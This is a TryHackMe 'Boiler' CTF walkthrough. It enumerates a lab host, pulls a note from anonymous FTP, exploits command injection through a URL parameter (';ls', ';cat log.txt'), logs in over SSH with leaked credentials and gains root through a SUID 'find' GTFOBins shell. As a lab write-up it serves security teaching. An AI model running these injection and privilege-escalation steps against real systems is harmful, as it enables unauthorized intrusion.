TryHackMe Boiler CTF Walkthrough: Complete Enumeration, Exploitation & Privilege Escalation Guide

In this walkthrough, we'll solve the Boiler CTF room on TryHackMe by performing enumeration, exploitation, and privilege escalation to obtain root access.

Lab environment

Target ip address:10.49.181.62

Objective: Enumerate services on the target, capture two flags, and complete the escalation path.

Note:- Make sure you are connected to the TryHackMe VPN before starting the challenge.

Common Tools

1. Nmap
2. Dirb
3. Cyberchef
4. GTFOBins

Step 1: In this step verify that the target machine is reachable.

Command:

ping -c 4 10.49.181.62

ping -c 4 10.49.181.62

Step 2: In this step Run an Nmap scan to identify open ports and detect running services and their versions on the target machine.

Command:

sudo nmap -sC -sV -p- 10.49.181.62

sudo nmap -sC -sV -p- 10.49.181.62

Step 3: In this step, we discovered that the FTP service is running and allows anonymous authentication. Since anonymous login is enabled, we can connect to the FTP server without valid user credentials and explore the available files and directories for further information gathering.

ftp 10.49.181.62 21
ls -la
get .info.txt

ftp 10.49.181.62 21
ls -la
get .info.txt

It looks like the text is encoded with ROT13. Let's decode it and see what it reveals.

Step 4 : In this step, browse to the web server running on port 80.

URL: http://10.49.181.62/

URL: http://10.49.181.62/

Step 5: After exploring the webpages, if nothing noteworthy is found, proceed to perform directory brute-forcing using a tool like dirb.

Step 6: During directory enumeration, I discovered the _test directory. Further investigation revealed a vulnerable parameter that allowed command injection.

Then, I found something interesting and decided to investigate the _test directory further.

Now, we need to manually enumerate the CMS to discover additional directories and hidden resources.

After some enumeration, I discovered a directory named _test. From there, we could use the vulnerable URL parameter to inject and execute our commands.

;ls

;ls

Now, we can use cat log.txt to view the contents of the file.

;cat log.txt

;cat log.txt

Step 7: The information gathered during enumeration revealed credentials for the user basterd, allowing SSH access.

Command:

ssh -p 55007 basterd@10.49.181.62

ssh -p 55007 basterd@10.49.181.62

After gaining access, I discovered a script named backup.sh. Examining its contents revealed information useful for lateral movement.

su stoner
ls -al
cat .secret

su stoner
ls -al
cat .secret

Step 8: In this step now we have to escalate privilege to get the root flag..

To identify potential privilege escalation vectors, I searched for SUID binaries

Command:

find / -perm -4000 2>/dev/null

find / -perm -4000 2>/dev/null

Now we will use GTFObins to find command for escalating to the root user.

Executing the following GTFOBins technique spawned a root shell, giving us full administrative access to the machine.

/usr/bin/find . -exec /bin/sh -p \; -quit

/usr/bin/find . -exec /bin/sh -p \; -quit

In this room, we performed service enumeration, leveraged anonymous FTP access, identified a command injection vulnerability, gained SSH access as a low-privileged user, and finally exploited a misconfigured SUID binary to obtain root privileges. This challenge highlights the importance of proper service configuration, secure credential management, and privilege separation.

Thanks for reading! I hope you found this walkthrough helpful. Feel free to connect with me for more cybersecurity content and TryHackMe writeups.